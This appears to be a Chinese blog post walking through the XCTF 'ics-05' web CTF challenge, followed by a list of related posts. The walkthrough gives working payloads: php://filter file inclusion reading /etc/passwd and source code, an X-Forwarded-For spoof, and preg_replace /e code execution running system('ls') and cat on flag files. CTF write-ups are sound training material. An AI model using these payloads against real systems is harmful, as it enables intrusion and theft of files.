攻防世界,Web:ics-05

最新推荐文章于 2024-05-24 22:00:00 发布
最新推荐文章于 2024-05-24 22:00:00 发布
阅读量495 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62260856/article/details/124566585
版权

工控系统 安全漏洞 渗透测试 preg_replace 源码泄露
关键词由CSDN通过智能技术生成

其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统

只能进入维护中心

要入侵系统,没有多余的信息,扫目录

 

没东西,那只能在原本页面找

源码中有个超链接

对应的是左上角的文字“云平台设备维护中心”

对应的 url,参数泄露

端口不给扫,先看看 ssh 开了没

?page=php://filter/read=convert.base64-encode/resource=../../../../etc/passwd

ssh 开了

用参数读页面源码,最下面多出一些源码,整理一下

<?php
$page = $_GET[page];

if (isset($page)) 
{

    if (ctype_alnum($page)) 
    {
        echo $page; die();
    }
    else
    {

        if (strpos($page, 'input') > 0) {
            die();
        }

        if (strpos($page, 'ta:text') > 0) {
            die();
        }

        if (strpos($page, 'text') > 0) {
            die();
        }

        if ($page === 'index.php') {
            die('Ok');
        }
        
        include($page);
        die();
    }
}

//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') 
{

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) 
    {
        preg_replace($pattern, $replacement, $subject);
    }
    else
    {
        die();
    }

}
?>

ctype_alnum 匹配是否为数字或字母

strpos 返回字符串在另一字符串中第一次出现的位置

前面没有用不用管,只看最后一个 if

改 127.0.0.1 访问

preg_replace() 函数的三个参数

$pattern: 要搜索的模式,可以是字符串或一个字符串数组。

$replacement: 用于替换的字符串或字符串数组。

$subject: 要搜索替换的目标字符串或字符串数组。

替换操作方法,查看操作系统下文件

?pat=/abc/e&rep=system("ls")&sub=abc

注意由于函数是执行正则表达式,替换后的内容需要执行得加上修饰符 e

Welcome My Admin !

css index.html index.php js layui logo.png s3chahahaDir start.sh 视图.png

?pat=/abc/e&rep=system("ls+s3chahahaDir")&sub=abc

 ?pat=/abc/e&rep=system("ls+s3chahahaDir/flag")&sub=abc

 ?pat=/abc/e&rep=system("cat+s3chahahaDir/flag/flag.php")&sub=abc

这里 flag 没有显现出来,在源码可以看到

 

Part 03
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
【网络安全 | XCTF】攻防世界 ics-05 解题详析
等风来
05-31 3710
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。在当前目录及其子目录中查找文件名中包含 xx 的文件,如。构造Payload如下,实现将sub中的。根据提示,进入维护中心页面。查看源代码 发现注入点。
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界-web ics-05
m0_48108919的博客
02-19 2408
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 逐个点击菜单栏,发现只有设备维护中心有跳转 题目提示了利用后门入侵,首先使用dirsearch扫描网站目录,发现有个/index.php/login目录 尝试访问,发现页面有超链接,尝试点击 发现page的参数会原样输出 尝试使用php伪协议读取文件: php伪协议参考:https://www.cnblogs.com/endust/p/11804767.html 构造payload读取index.php..
[XCTF_网络安全] 攻防世界 ics-05 解题详析
最新发布
qingkahui24689的博客
05-24 582
[XCTF_网络安全] 攻防世界 ics-05 解题详析,该题考察XFF及/e修正符的相关知识。
XCTF-攻防世界CTF平台-Web类——17、ics-05php://filter 协议、preg_replace函数命令执行)
Onlyone_1314的博客
01-01 2887
查看题目: 提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统,可能和后门程序有关,位置在工控云管理系统的设备维护中心 打开题目地址: 查看页面源代码: 只有设备维护中心的链接点击会跳转到index.php: 显示:数据接口请求异常 再查看index.php的源代码: 在云平台设备维护中心处有一个链接?page=index 点击之后: 它以GET方式提交page变量的值为index,后端index.php处理之后返回index。 传入page=123456,返回123456 所以我
攻防世界-web-ics-05
32bin的博客
09-17 294
其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。77最佳Writeup由 darkless 提供。GFSJ0332积分 3金币 3。Click 设备维护中心。题目来源: XCTF。
胡乱自学黑客的,能骂醒一个算一个
2401_84208172的博客
05-05 753
为啥说胡乱自学黑客的,能骂醒一个算一个。因为很多人学会个工具就觉得自己是黑客了,其实再真正的黑客眼里,你就是个脚本小子而已。首先我谈下对黑客&网络安全的认知,其实最重要的是兴趣热爱,不同于网络安全工程师,他们大都是培训机构培训出来的,具备的基本都是防御和白帽子技能,他们绝大多数的人看的是工资,他们是为了就业而学习,为了走捷径才去参加培训。
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界Let-god-knows杂项
11-20
攻防世界Let_god_knows杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947532
攻防世界hit-the-core,杂项misc
11-01
攻防世界hit-the-core,杂项misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127626829
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757
攻防世界Webics-05
Light_inthe_eyes的博客
10-16 132
打开页面后,发现什么也没法操作: 只好代码审计,发现有一个page参数可利用,此时猜想文件包含读取网页漏洞的问题: 用php:filter//构造payload: php://filter/read=convert.base64-encode/resource=index.php 看到经过base64加密后的代码: 通过base64解密后的关键代码: if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') { echo "<br &g
CTF_Web攻防世界高手区进阶题WP(15-18)
AFCC_的博客(Web_Dog)
09-01 996
0x15 easytornado 0x16 shrine 0x17 isc-05 题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。 这个题目提示了出现问题的地方在于设备维护中心页面,所以我们直接进去。 url为:http://111.200.241.244:63219/index.php?page=index 发现页面直接显示了index。 基本page是输入什么回显什么,这里使用php伪协议读取文件源码试试php://filter/read=convert.base64-encode/
ctf随笔(2)被后门入侵的系统
ma_nong_的博客
09-19 1400
这是一道我觉得是我真正开始接触ctf的一题,涉及到php正则表达式,和php://filter协议 题目描述:破坏者会利用工控云管理系统设备维护中心的后门入侵系统 进入之后如下界面 再次点击云平台设备维护中心之后,会发现url和显示都有改变 网址也从111.198.29.45:52706/index.php变成了111.198.29.45:52706/index.php?page=index 尝试...
XCTF攻防世界webics-05(含自动化脚本)
weixin_50464560的博客
02-10 869
一、手解 本文借鉴以下两篇文章的指导 https://www.jianshu.com/p/5a502873635b https://blog.csdn.net/about23/article/details/95349625   全部点击一遍,只有这个可以有其他界面   题目描述是 “其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统” 在后面添加login.php 无果,御剑扫描也无结果,源码也找不到其他东西 再次点击上面的“云平台设备维
攻防世界 WEB ics-02
qq_41696858的博客
10-01 240
考的是sql注入,结合之前的ics系列,肯定要从唯一有用的a链接入手,发现文档中心可以进入,点进去,又发现一个a链接 <a href="download.php?dl=ssrf">paper. </a> 下下来download.php,打开可以发现pdf之类的头,那么就是个pdf,结合ssrf的提示,后面可能会有用 然后扫一波目录,发现/secrets目录 发现里面有secret_debug.php和secret.php两个文件,其中debug文件不能直接访问,那么ssrf大概就
攻防世界ics-5wp
T19er的博客
07-10 2828
0x01 ics-5 浏览只有一个index页面,想到down源码,无果。 查看源代码发现有个page参数可以传值,利用LFI来查看源码。 /index.php?page=php://filter/read=convert.base64-encode/resource=index.php 读到base64加密的源码 PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwoKQHNl...
XCTF web ics-05
H4ppyD0g的博客
09-06 309
preg_replace() 函数执行一个正则表达式的搜索和替换。 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) 搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。 ...
php://filter(文件包含漏洞利用)
MIGENGKING的博客
10-12 8165
“网址+/index.php?page=php://filter/convert.base64-encode/resource=index.php“ 例如: http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php 首先这是一个file关键字的ge...
web-ics-05
07-28
- *2* [攻防世界-ics-05-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125291336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Part 03

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值